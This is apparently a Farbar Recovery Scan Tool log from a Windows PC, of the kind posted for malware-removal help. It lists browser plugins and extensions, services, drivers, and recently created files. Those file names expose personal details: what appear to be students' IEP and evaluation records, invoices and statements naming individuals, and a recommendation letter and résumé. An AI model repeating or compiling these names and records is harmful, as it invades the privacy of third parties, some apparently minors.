FF HKU\S-1-5-21-2968691658-935218191-2636090816-1000\...\Firefox\Extensions: [smartwebprinting@hp.com] - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\MozillaAddOn3
 
Chrome: 
=======
CHR HomePage: Default -> hxxp://www.google.com/
CHR StartupUrls: Default -> "","hxxp://www.google.com/","hxxp://google.com/"
CHR Plugin: (Shockwave Flash) - C:\Program Files (x86)\Google\Chrome\Application\49.0.2623.87\PepperFlash\pepflashplayer.dll ()
CHR Plugin: (Native Client) - C:\Program Files (x86)\Google\Chrome\Application\49.0.2623.87\ppGoogleNaClPluginChrome.dll => No File
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files (x86)\Google\Chrome\Application\49.0.2623.87\pdf.dll => No File
CHR Plugin: (Adobe Acrobat) - C:\Program Files (x86)\Adobe\Reader 8.0\Reader\Browser\nppdf32.dll (Adobe Systems Inc.)
CHR Plugin: (QuickTime Plug-in 7.6.8) - C:\Program Files (x86)\QuickTime\plugins\npqtplugin.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.6.8) - C:\Program Files (x86)\QuickTime\plugins\npqtplugin2.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.6.8) - C:\Program Files (x86)\QuickTime\plugins\npqtplugin3.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.6.8) - C:\Program Files (x86)\QuickTime\plugins\npqtplugin4.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.6.8) - C:\Program Files (x86)\QuickTime\plugins\npqtplugin5.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.6.8) - C:\Program Files (x86)\QuickTime\plugins\npqtplugin6.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.6.8) - C:\Program Files (x86)\QuickTime\plugins\npqtplugin7.dll (Apple Inc.)
CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~2\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~2\MICROS~2\Office14\NPSPWRAP.DLL (Microsoft Corporation)
CHR Plugin: (Google Update) - C:\Program Files (x86)\Google\Update\1.3.21.153\npGoogleUpdate3.dll => No File
CHR Plugin: (Verizon Servicepoint) - C:\Program Files (x86)\Verizon\VSP\nprpspa.dll => No File
CHR Plugin: (Windows Live® Photo Gallery) - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
CHR Plugin: (iTunes Application Detector) - C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
CHR Plugin: (Hulu Desktop) - C:\Windows\..\Users\Default\AppData\Local\HuluDesktop\instances\0.9.9.1\npHDPlg.dll (Hulu LLC)
CHR Plugin: (Silverlight Plug-In) - c:\Program Files (x86)\Microsoft Silverlight\5.1.20513.0\npctrl.dll => No File
CHR Profile: C:\Users\lks\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Docs) - C:\Users\lks\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-02-05]
CHR Extension: (Google Drive) - C:\Users\lks\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-10-21]
CHR Extension: (YouTube) - C:\Users\lks\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-24]
CHR Extension: (Google Search) - C:\Users\lks\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-10-27]
CHR Extension: (Google Docs Offline) - C:\Users\lks\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-03-15]
CHR Extension: (Avast Online Security) - C:\Users\lks\AppData\Local\Google\Chrome\User Data\Default\Extensions\gomekmidlodglbbmalcneegieacbdmki [2016-03-30]
CHR Extension: (Pin It Button) - C:\Users\lks\AppData\Local\Google\Chrome\User Data\Default\Extensions\gpdjojdkbbmdfjfahjcgigfpmkopogic [2015-09-24]
CHR Extension: (Chrome Web Store Payments) - C:\Users\lks\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-07-24]
CHR Extension: (Gmail) - C:\Users\lks\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-03-30]
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx [2016-03-28]
StartMenuInternet: Google Chrome.2UNIDCIXIJAFXHIM7JZXQSVXD4 - C:\Users\Lara\AppData\Local\Google\Chrome\Application\chrome.exe
 
==================== Services (Whitelisted) ========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 ACDaemon; C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ACService.exe [113152 2010-03-18] (ArcSoft Inc.)
R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [237096 2016-03-28] (AVAST Software)
R2 EMP_UDSA; C:\Program Files (x86)\EPSON Projector\EPSON USB Display V1.4\EMP_UDSA.exe [98304 2009-04-15] (SEIKO EPSON CORPORATION) [File not signed]
R2 HP Health Check Service; C:\Program Files (x86)\Hewlett-Packard\HP Health Check\hphc_service.exe [125440 2009-09-24] (Hewlett-Packard) [File not signed]
R3 hpqcxs08; C:\Program Files (x86)\HP\Digital Imaging\bin\hpqcxs08.dll [249344 2009-09-23] (Hewlett-Packard Co.) [File not signed]
R2 hpqddsvc; C:\Program Files (x86)\HP\Digital Imaging\bin\hpqddsvc.dll [133120 2009-09-23] (Hewlett-Packard Co.) [File not signed]
R2 HPSLPSVC; C:\Program Files (x86)\HP\Digital Imaging\bin\HPSLPSVC64.DLL [1037824 2009-09-23] (Hewlett-Packard Co.) [File not signed]
R2 LightScribeService; c:\Program Files (x86)\Common Files\LightScribe\LSSrvc.exe [73728 2009-08-20] (Hewlett-Packard Company) [File not signed]
R3 MSSQL$MSSMLBIZ; c:\Program Files (x86)\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe [29293408 2010-12-10] (Microsoft Corporation)
R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [71680 2008-12-03] (Hewlett-Packard) [File not signed]
R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [89600 2008-12-03] (Hewlett-Packard) [File not signed]
R2 QBCFMonitorService; C:\Program Files (x86)\Common Files\Intuit\QuickBooks\QBCFMonitorService.exe [45056 2015-02-27] (Intuit) [File not signed]
S3 QBFCService; C:\Program Files (x86)\Common Files\Intuit\QuickBooks\FCS\Intuit.QuickBooks.FCS.exe [61440 2011-08-19] (Intuit Inc.) [File not signed]
R2 QBVSS; C:\Program Files (x86)\Common Files\Intuit\DataProtect\QBIDPService.exe [1248256 2011-08-19] (Intuit Inc.) [File not signed]
R3 QuickBooksDB22; C:\Program Files (x86)\Intuit\QuickBooks 2012\QBDBMgrN.exe [679936 2015-02-27] (Intuit, Inc.) [File not signed]
S2 SDScannerService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe [1738168 2014-06-24] (Safer-Networking Ltd.)
R2 SDUpdateService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe [2088408 2014-06-27] (Safer-Networking Ltd.)
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [6942480 2016-03-02] (TeamViewer GmbH)
R2 WebrootSpySweeperService; C:\Program Files (x86)\Webroot\WebrootSecurity\SpySweeper.exe [4048240 2009-11-06] (Webroot Software, Inc. (www.webroot.com))
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)
R2 WRConsumerService; C:\Program Files (x86)\Webroot\WebrootSecurity\WRConsumerService.exe [1201640 2010-02-15] (Webroot Software, Inc. )
R2 WSWNA3100M; C:\Program Files (x86)\NETGEAR\WNA3100M\WifiSvc.exe [307488 2012-08-16] ()
S4 CarboniteService; "C:\Program Files\Carbonite\Carbonite Backup\carboniteservice.exe" [X]
 
===================== Drivers (Whitelisted) ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 aswHwid; C:\Windows\system32\drivers\aswHwid.sys [37656 2016-03-28] (AVAST Software)
R1 aswKbd; C:\Windows\system32\drivers\aswKbd.sys [37144 2016-03-28] (AVAST Software)
R2 aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [107792 2016-03-28] (AVAST Software)
R1 aswRdr; C:\Windows\system32\drivers\aswRdr2.sys [103064 2016-03-28] (AVAST Software)
R0 aswRvrt; C:\Windows\System32\Drivers\aswRvrt.sys [74544 2016-03-28] (AVAST Software)
R1 aswSnx; C:\Windows\system32\drivers\aswSnx.sys [1070904 2016-03-28] (AVAST Software)
R1 aswSP; C:\Windows\system32\drivers\aswSP.sys [463744 2016-03-28] (AVAST Software)
R2 aswStm; C:\Windows\system32\drivers\aswStm.sys [165344 2016-03-28] (AVAST Software)
R0 aswVmm; C:\Windows\System32\Drivers\aswVmm.sys [287016 2016-03-28] (AVAST Software)
S3 ebdrv; C:\Windows\system32\DRIVERS\evbda.sys [3286016 2009-06-10] (Broadcom Corporation)
R0 ssfs0bbc; C:\Windows\System32\DRIVERS\ssfs0bbc.sys [37488 2009-11-06] (Webroot Software, Inc. (www.webroot.com))
R0 ssidrv; C:\Windows\System32\DRIVERS\ssidrv.sys [135280 2009-11-06] (Webroot Software, Inc. (www.webroot.com))
R3 wna3100m; C:\Windows\System32\DRIVERS\wna3100m.sys [1094760 2011-12-30] (NETGEAR Corporation                           )
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-03-30 08:29 - 2016-03-30 08:30 - 00034012 _____ C:\Users\lks\Desktop\FRST.txt
2016-03-30 08:29 - 2016-03-30 08:29 - 00000000 ____D C:\FRST
2016-03-30 08:28 - 2016-03-29 18:19 - 02374144 _____ (Farbar) C:\Users\lks\Desktop\FRST64.exe
2016-03-30 08:27 - 2016-03-30 08:27 - 00032256 _____ C:\Users\lks\Downloads\3-29-16 Kristen Tuesday Data.xls
2016-03-29 16:43 - 2016-03-29 16:43 - 02195956 _____ C:\Users\lks\Documents\Scan0116.pdf
2016-03-29 16:40 - 2016-03-29 16:40 - 10148246 _____ C:\Users\lks\Documents\Cally Catalan IEP 2016.pdf
2016-03-29 12:33 - 2016-03-29 12:33 - 00469077 _____ C:\Users\lks\Desktop\Camp Matty Flyer 2016.pdf
2016-03-29 12:26 - 2016-03-29 12:26 - 00469077 _____ C:\Users\lks\Downloads\Campy Matty Flyer (3).pdf
2016-03-29 11:27 - 2016-03-29 11:27 - 00017667 _____ C:\Users\lks\Downloads\3-17-16 Kristen Thursday Data Sheet (2).xlsx
2016-03-29 11:27 - 2016-03-29 11:27 - 00017438 _____ C:\Users\lks\Downloads\3-24-16 Kristen Thursday Data Sheet (1).xlsx
2016-03-29 09:10 - 2016-03-29 09:10 - 00091452 _____ C:\Users\lks\Desktop\Extras.Txt
2016-03-29 09:08 - 2016-03-29 09:08 - 00153322 _____ C:\Users\lks\Desktop\OTL.Txt
2016-03-29 08:50 - 2016-03-28 20:47 - 00602112 _____ (OldTimer Tools) C:\Users\lks\Desktop\OTL.exe
2016-03-29 08:25 - 2016-03-29 08:25 - 00475606 _____ C:\Users\lks\Downloads\Monday Data Sheet 03-28-16      (1).xlsx
2016-03-29 08:25 - 2016-03-29 08:25 - 00016271 _____ C:\Users\lks\Downloads\3-28-16 Kristen Monday Data Sheet.xlsx
2016-03-29 08:24 - 2016-03-29 08:24 - 00475606 _____ C:\Users\lks\Downloads\Monday Data Sheet 03-28-16     .xlsx
2016-03-29 08:21 - 2016-03-29 08:30 - 201900432 _____ (AVAST Software) C:\Users\lks\Downloads\avast_free_antivirus_setup.exe
2016-03-28 22:55 - 2016-03-28 20:52 - 00448512 _____ (OldTimer Tools) C:\Users\lks\Desktop\TFC.exe
2016-03-28 21:31 - 2016-03-28 21:31 - 00003056 _____ C:\Windows\System32\Tasks\SafeZone scheduled Autoupdate 1459215076
2016-03-28 21:31 - 2016-03-28 21:31 - 00001039 _____ C:\Users\Public\Desktop\Avast SafeZone Browser.lnk
2016-03-28 21:31 - 2016-03-28 21:31 - 00001039 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avast SafeZone Browser.lnk
2016-03-28 21:30 - 2016-03-28 21:30 - 00037144 _____ (AVAST Software) C:\Windows\system32\Drivers\aswKbd.sys
2016-03-28 21:16 - 2016-03-28 21:16 - 00000000 ____D C:\Users\lks\AppData\Roaming\AVAST Software
2016-03-28 21:15 - 2016-03-28 21:15 - 00001924 _____ C:\Users\Public\Desktop\Avast Free Antivirus.lnk
2016-03-28 21:15 - 2016-03-28 21:15 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVAST Software
2016-03-28 21:14 - 2016-03-28 21:14 - 00000000 ____D C:\Windows\System32\Tasks\AVAST Software
2016-03-28 21:13 - 2016-03-30 07:59 - 00004182 _____ C:\Windows\System32\Tasks\avast! Emergency Update
2016-03-28 21:12 - 2016-03-28 21:14 - 01070904 _____ (AVAST Software) C:\Windows\system32\Drivers\aswsnx.sys
2016-03-28 21:12 - 2016-03-28 21:14 - 00463744 _____ (AVAST Software) C:\Windows\system32\Drivers\aswsp.sys
2016-03-28 21:12 - 2016-03-28 21:14 - 00287016 _____ (AVAST Software) C:\Windows\system32\Drivers\aswvmm.sys
2016-03-28 21:12 - 2016-03-28 21:14 - 00107792 _____ (AVAST Software) C:\Windows\system32\Drivers\aswmonflt.sys
2016-03-28 21:12 - 2016-03-28 21:11 - 00398152 _____ (AVAST Software) C:\Windows\system32\aswBoot.exe
2016-03-28 21:12 - 2016-03-28 21:11 - 00165344 _____ (AVAST Software) C:\Windows\system32\Drivers\aswStm.sys
2016-03-28 21:12 - 2016-03-28 21:11 - 00103064 _____ (AVAST Software) C:\Windows\system32\Drivers\aswRdr2.sys
2016-03-28 21:12 - 2016-03-28 21:11 - 00074544 _____ (AVAST Software) C:\Windows\system32\Drivers\aswRvrt.sys
2016-03-28 21:12 - 2016-03-28 21:11 - 00037656 _____ (AVAST Software) C:\Windows\system32\Drivers\aswHwid.sys
2016-03-28 21:11 - 2016-03-28 21:11 - 00052184 _____ (AVAST Software) C:\Windows\avastSS.scr
2016-03-28 21:10 - 2016-03-28 21:30 - 00000000 ____D C:\Program Files\AVAST Software
2016-03-28 21:08 - 2016-03-28 21:30 - 00000000 ____D C:\ProgramData\AVAST Software
2016-03-28 20:38 - 2016-03-28 20:39 - 00002219 _____ C:\Windows\wininit.ini
2016-03-28 19:04 - 2016-03-28 21:14 - 00000000 ____D C:\Program Files\Common Files\AV
2016-03-28 19:04 - 2015-07-28 17:52 - 00821920 _____ (Safer-Networking Ltd. ) C:\Users\Public\Desktop\Post Win10 Spybot-install.exe
2016-03-28 18:51 - 2016-03-28 20:38 - 00000000 ____D C:\ProgramData\Spybot - Search & Destroy
2016-03-28 18:51 - 2016-03-28 19:12 - 00000000 ____D C:\Program Files (x86)\Spybot - Search & Destroy 2
2016-03-28 18:51 - 2016-03-28 18:51 - 00001353 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot-S&D Start Center.lnk
2016-03-28 18:51 - 2016-03-28 18:51 - 00001341 _____ C:\Users\Public\Desktop\Spybot-S&D Start Center.lnk
2016-03-28 18:51 - 2016-03-28 18:51 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot - Search & Destroy 2
2016-03-28 18:51 - 2013-09-20 10:49 - 00021040 _____ (Safer Networking Limited) C:\Windows\system32\sdnclean64.exe
2016-03-28 18:31 - 2016-03-28 18:31 - 00003068 _____ C:\Windows\System32\Tasks\{1BA4930E-BE44-4527-9171-08629A7DB7F9}
2016-03-28 17:31 - 2016-03-28 20:49 - 00192216 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2016-03-28 17:31 - 2016-03-28 17:31 - 00001064 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2016-03-28 17:31 - 2016-03-28 17:31 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2016-03-28 17:31 - 2016-03-28 17:31 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2016-03-28 17:31 - 2016-03-10 14:09 - 00064896 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2016-03-28 17:31 - 2016-03-10 14:08 - 00140672 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamchameleon.sys
2016-03-28 17:31 - 2016-03-10 14:08 - 00027008 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys
2016-03-28 17:18 - 2016-03-28 17:27 - 113639433 _____ (AVAST Software) C:\Users\lks\Downloads\avast_free_antivirus_setup.exe.opdownload
2016-03-28 16:05 - 2016-03-28 16:05 - 00469077 _____ C:\Users\lks\Downloads\Campy Matty Flyer (2).pdf
2016-03-28 16:05 - 2016-03-28 16:05 - 00469077 _____ C:\Users\lks\Downloads\Campy Matty Flyer (1).pdf
2016-03-28 15:59 - 2016-03-28 15:59 - 00469077 _____ C:\Users\lks\Downloads\Campy Matty Flyer.pdf
2016-03-28 14:49 - 2016-03-28 14:49 - 00000000 ____D C:\Users\lks\AppData\Local\TeamViewer
2016-03-28 14:47 - 2016-03-29 08:26 - 00000000 ____D C:\Users\lks\AppData\Roaming\TeamViewer
2016-03-28 14:47 - 2016-03-28 17:58 - 00000000 ____D C:\Program Files (x86)\TeamViewer
2016-03-28 14:47 - 2016-03-28 14:47 - 00001005 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TeamViewer 11.lnk
2016-03-28 14:47 - 2016-03-28 14:47 - 00000993 _____ C:\Users\Public\Desktop\TeamViewer 11.lnk
2016-03-28 14:45 - 2016-03-28 14:46 - 09740464 _____ (TeamViewer GmbH) C:\Users\lks\Downloads\TeamViewer_Setup_en.exe
2016-03-25 12:26 - 2016-03-25 12:26 - 00023250 _____ C:\Users\lks\Downloads\Statement-Emilie Ruggiero 3.25.16.pdf
2016-03-25 12:26 - 2016-03-25 12:26 - 00023250 _____ C:\Users\lks\Downloads\Statement-Emilie Ruggiero 3.25.16 (1).pdf
2016-03-25 12:07 - 2016-03-25 12:07 - 01123809 _____ C:\Users\lks\Downloads\Invoice 2122.pdf
2016-03-25 12:07 - 2016-03-25 12:07 - 01123694 _____ C:\Users\lks\Downloads\Invoice 2204.pdf
2016-03-25 12:07 - 2016-03-25 12:07 - 01121703 _____ C:\Users\lks\Downloads\Invoice 2099.pdf
2016-03-25 12:07 - 2016-03-25 12:07 - 00025036 _____ C:\Users\lks\Downloads\Statement-Emilie Ruggiero (2).pdf
2016-03-25 12:03 - 2016-03-25 12:03 - 00023535 _____ C:\Users\lks\Downloads\Statement-Emilie Ruggiero (1).pdf
2016-03-25 12:01 - 2016-03-25 12:01 - 00077102 _____ C:\Users\lks\Downloads\PR invoice #2278 (4).pdf
2016-03-25 12:01 - 2016-03-25 12:01 - 00077102 _____ C:\Users\lks\Downloads\PR invoice #2278 (3).pdf
2016-03-25 10:55 - 2016-03-25 10:55 - 00077102 _____ C:\Users\lks\Downloads\PR invoice #2278 (2).pdf
2016-03-25 10:55 - 2016-03-25 10:55 - 00077102 _____ C:\Users\lks\Downloads\PR invoice #2278 (1).pdf
2016-03-25 10:25 - 2016-03-25 10:25 - 01394650 _____ C:\Users\lks\Desktop\General Ledger Report 2015.pdf
2016-03-25 10:24 - 2016-03-25 10:24 - 00041232 _____ C:\Users\lks\Desktop\Profit and Loss Report 2015.pdf
2016-03-25 10:23 - 2016-03-25 10:23 - 00039775 _____ C:\Users\lks\Desktop\AR Aging Summary.pdf
2016-03-25 10:22 - 2016-03-25 10:26 - 00040412 _____ C:\Users\lks\Desktop\Trial Balance report 2015.pdf
2016-03-25 08:48 - 2016-03-25 08:48 - 00017438 _____ C:\Users\lks\Downloads\3-24-16 Kristen Thursday Data Sheet.xlsx
2016-03-24 15:36 - 2016-03-24 15:36 - 00495731 _____ C:\Users\lks\Downloads\internship acceptance fp 2016.pdf
2016-03-24 14:40 - 2016-03-24 14:40 - 00033280 _____ C:\Users\lks\Downloads\3-22-16 Kristen Tuesday Data.xls
2016-03-24 14:38 - 2016-03-24 14:38 - 00030208 _____ C:\Users\lks\Downloads\3-18-16 Kristen Friday Data  (3).xls
2016-03-24 14:36 - 2016-03-24 14:36 - 00017667 _____ C:\Users\lks\Downloads\3-17-16 Kristen Thursday Data Sheet (1).xlsx
2016-03-24 13:09 - 2016-03-24 13:09 - 00000124 _____ C:\Users\lks\AppData\Roaming\wklnhst.dat
2016-03-24 13:03 - 2016-03-28 21:15 - 00007633 _____ C:\Users\lks\AppData\Local\Resmon.ResmonCfg
2016-03-24 12:54 - 2016-03-24 12:54 - 00017667 _____ C:\Users\lks\Downloads\3-17-16 Kristen Thursday Data Sheet.xlsx
2016-03-24 12:53 - 2016-03-24 12:53 - 00015209 _____ C:\Users\lks\Downloads\3-16-16 Wednesday Data Sheet (3).xlsx
2016-03-24 12:48 - 2016-03-24 12:48 - 00015327 _____ C:\Users\lks\Downloads\3-23-16 Wednesday Data Sheet.xlsx
2016-03-24 12:48 - 2016-03-24 12:48 - 00015327 _____ C:\Users\lks\Downloads\3-23-16 Wednesday Data Sheet (1).xlsx
2016-03-24 09:37 - 2016-03-30 08:03 - 00003854 _____ C:\Windows\System32\Tasks\Opera scheduled Autoupdate 1458826625
2016-03-24 09:37 - 2016-03-30 08:03 - 00000000 ____D C:\Program Files (x86)\Opera
2016-03-24 09:37 - 2016-03-24 09:37 - 00001097 _____ C:\Users\Public\Desktop\Opera.lnk
2016-03-24 09:37 - 2016-03-24 09:37 - 00001097 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Opera.lnk
2016-03-24 09:37 - 2016-03-24 09:37 - 00000000 ____D C:\Users\lks\AppData\Roaming\Opera Software
2016-03-24 09:37 - 2016-03-24 09:37 - 00000000 ____D C:\Users\lks\AppData\Local\Opera Software
2016-03-23 09:26 - 2016-03-23 09:26 - 00112265 _____ C:\Users\lks\Downloads\Music5KFlier.docx.pdf
2016-03-23 08:41 - 2016-03-23 08:41 - 00242128 _____ C:\Users\lks\Downloads\Firefox Setup Stub 45.0.1 (1).exe
2016-03-23 08:34 - 2016-03-23 08:34 - 00242128 _____ C:\Users\lks\Downloads\Firefox Setup Stub 45.0.1.exe
2016-03-22 10:47 - 2016-03-22 10:47 - 01231107 _____ C:\Users\lks\Downloads\SKMBT_36315022412400.pdf
2016-03-21 16:44 - 2016-03-21 16:44 - 02399949 _____ C:\Users\lks\Documents\AM Song lyrics.pdf
2016-03-21 15:57 - 2016-03-21 15:57 - 00003021 _____ C:\Users\lks\Desktop\Microsoft Word 2010 (2).lnk
2016-03-21 15:34 - 2016-03-21 15:34 - 00000000 ____D C:\Users\lks\AppData\Local\HuluDesktop
2016-03-21 15:09 - 2016-03-21 15:09 - 00476568 _____ C:\Users\lks\Downloads\Thursday Data Sheet 03-17-16      (2).xlsx
2016-03-21 15:08 - 2016-03-21 15:08 - 01071665 _____ C:\Users\lks\Downloads\C Costa music form (1).pdf
2016-03-21 15:08 - 2016-03-21 15:08 - 00030208 _____ C:\Users\lks\Downloads\3-18-16 Kristen Friday Data  (2).xls
2016-03-21 14:42 - 2016-03-21 14:42 - 00000000 ____D C:\Users\Guest\AppData\Local\VNT
2016-03-21 13:53 - 2016-03-21 13:53 - 01071665 _____ C:\Users\lks\Downloads\C Costa music form.pdf
2016-03-21 13:53 - 2016-03-21 13:53 - 00476568 _____ C:\Users\lks\Downloads\Thursday Data Sheet 03-17-16      (1).xlsx
2016-03-21 13:52 - 2016-03-21 13:52 - 00030208 _____ C:\Users\lks\Downloads\3-18-16 Kristen Friday Data  (1).xls
2016-03-21 10:24 - 2016-03-21 10:24 - 00030208 _____ C:\Users\lks\Downloads\3-18-16 Kristen Friday Data .xls
2016-03-21 10:23 - 2016-03-21 10:23 - 00476568 _____ C:\Users\lks\Downloads\Thursday Data Sheet 03-17-16     .xlsx
2016-03-17 14:34 - 2016-03-17 14:35 - 00947103 _____ C:\Users\lks\Downloads\Forrest Letter Rec (1).PDF
2016-03-17 14:33 - 2016-03-17 14:33 - 00097332 _____ C:\Users\lks\Downloads\RecPaquinForrest(2) (1).pdf
2016-03-17 14:28 - 2016-03-17 14:28 - 00213596 _____ C:\Users\lks\Downloads\ForrestPaquin_MTJobResume16.docx(1) (1).pdf
2016-03-17 14:27 - 2016-03-17 14:27 - 00947103 _____ C:\Users\lks\Downloads\Forrest Letter Rec.PDF
2016-03-17 14:27 - 2016-03-17 14:27 - 00871004 _____ C:\Users\lks\Downloads\Letter of Recommendation- Forrest Paquin.pdf
2016-03-17 14:27 - 2016-03-17 14:27 - 00213596 _____ C:\Users\lks\Downloads\ForrestPaquin_MTJobResume16.docx(1).pdf
2016-03-17 14:27 - 2016-03-17 14:27 - 00097332 _____ C:\Users\lks\Downloads\RecPaquinForrest(2).pdf
2016-03-17 14:27 - 2016-03-17 14:27 - 00072125 _____ C:\Users\lks\Downloads\forrestpaquinreference.docx(1).pdf
2016-03-17 14:19 - 2016-03-17 14:20 - 01041120 _____ C:\Users\lks\Downloads\C Costa IEP (1).pdf
2016-03-17 14:19 - 2016-03-17 14:19 - 00680791 _____ C:\Users\lks\Downloads\C Costa music eval referral (1).pdf
2016-03-17 09:20 - 2016-03-17 09:20 - 00247439 _____ C:\Users\lks\Downloads\R Valente music re eval.pdf
2016-03-17 08:36 - 2016-03-17 08:36 - 00478795 _____ C:\Users\lks\Downloads\Wednesday Data Sheet 03-16-16     .xlsx
2016-03-17 08:36 - 2016-03-17 08:36 - 00015209 _____ C:\Users\lks\Downloads\3-16-16 Wednesday Data Sheet.xlsx
2016-03-17 08:36 - 2016-03-17 08:36 - 00015209 _____ C:\Users\lks\Downloads\3-16-16 Wednesday Data Sheet (2).xlsx
2016-03-17 08:36 - 2016-03-17 08:36 - 00015209 _____ C:\Users\lks\Downloads\3-16-16 Wednesday Data Sheet (1).xlsx
2016-03-16 14:18 - 2016-03-16 14:18 - 00474598 _____ C:\Users\lks\Downloads\Tuesday  Data Sheet 03-08-16    (4).xlsx
2016-03-16 14:18 - 2016-03-16 14:18 - 00474598 _____ C:\Users\lks\Downloads\Tuesday  Data Sheet 03-08-16    (3).xlsx
2016-03-16 13:24 - 2016-03-16 13:24 - 00473596 _____ C:\Users\lks\Downloads\Tuesday  Data Sheet 03-15-16     (2).xlsx
2016-03-16 12:16 - 2016-03-16 12:20 - 00029696 _____ C:\Users\lks\Downloads\Assignment Sheet -Demovick (1)
2016-03-16 11:40 - 2016-03-16 11:40 - 00473596 _____ C:\Users\lks\Downloads\Tuesday  Data Sheet 03-15-16     (1).xlsx
2016-03-16 10:35 - 2016-03-16 10:35 - 00473596 _____ C:\Users\lks\Downloads\Tuesday  Data Sheet 03-15-16    .xlsx
2016-03-16 10:35 - 2016-03-16 10:35 - 00353582 _____ C:\Users\lks\Downloads\JP IEP Data.pdf
2016-03-16 10:29 - 2016-03-16 10:29 - 00708170 _____ C:\Users\lks\Documents\DD Assessment.pdf
2016-03-16 10:27 - 2016-03-16 10:27 - 00309628 _____ C:\Users\lks\Documents\Scan0115.pdf
2016-03-16 10:24 - 2016-03-16 10:24 - 00320369 _____ C:\Users\lks\Documents\Scan0114.pdf
2016-03-16 10:22 - 2016-03-16 10:22 - 00309790 _____ C:\Users\lks\Documents\Scan0113.pdf
2016-03-16 09:56 - 2016-03-16 09:56 - 00000000 ____D C:\Users\lks\AppData\Local\TempOfficeC2R3B0CD812-6884-4C82-A14B-9EF44340F548
2016-03-15 15:56 - 2016-03-15 15:56 - 00563192 _____ C:\Windows\Minidump\031516-33899-01.dmp
2016-03-15 13:53 - 2016-03-15 14:29 - 00000000 ____D C:\Users\lks\Documents\WageWorks
2016-03-15 13:53 - 2016-03-15 13:52 - 00539128 _____ C:\Users\lks\Documents\Basler 11.28.15 12.29.15 - Copy.pdf
2016-03-15 09:25 - 2016-03-15 09:25 - 00003552 _____ C:\Windows\System32\Tasks\HP AR Program Upload - be379e414f6c4259bbed532290aba207a5bca86995914c4cac819699c6d7307f
2016-03-15 08:36 - 2016-03-15 08:36 - 00016237 _____ C:\Users\lks\Downloads\3-14-16 Kristen Monday Data Sheet.xlsx
2016-03-14 11:55 - 2016-03-14 11:56 - 01041120 _____ C:\Users\lks\Downloads\C Costa IEP.pdf
2016-03-14 11:55 - 2016-03-14 11:55 - 00680791 _____ C:\Users\lks\Downloads\C Costa music eval referral.pdf
2016-03-14 08:20 - 2016-03-14 08:20 - 00017672 _____ C:\Users\lks\Downloads\3-10-16 Kristen Thursday Data Sheet.xlsx
2016-03-11 12:32 - 2016-03-11 12:32 - 00013793 _____ C:\Users\lks\Downloads\JF estimate for this year (8)
2016-03-11 11:49 - 2016-03-11 11:49 - 00479470 _____ C:\Users\lks\Downloads\Wednesday Data Sheet 03-09-16      (1).xlsx
2016-03-11 11:49 - 2016-03-11 11:49 - 00474673 _____ C:\Users\lks\Downloads\Tuesday  Data Sheet 03-08-16    (2).xlsx
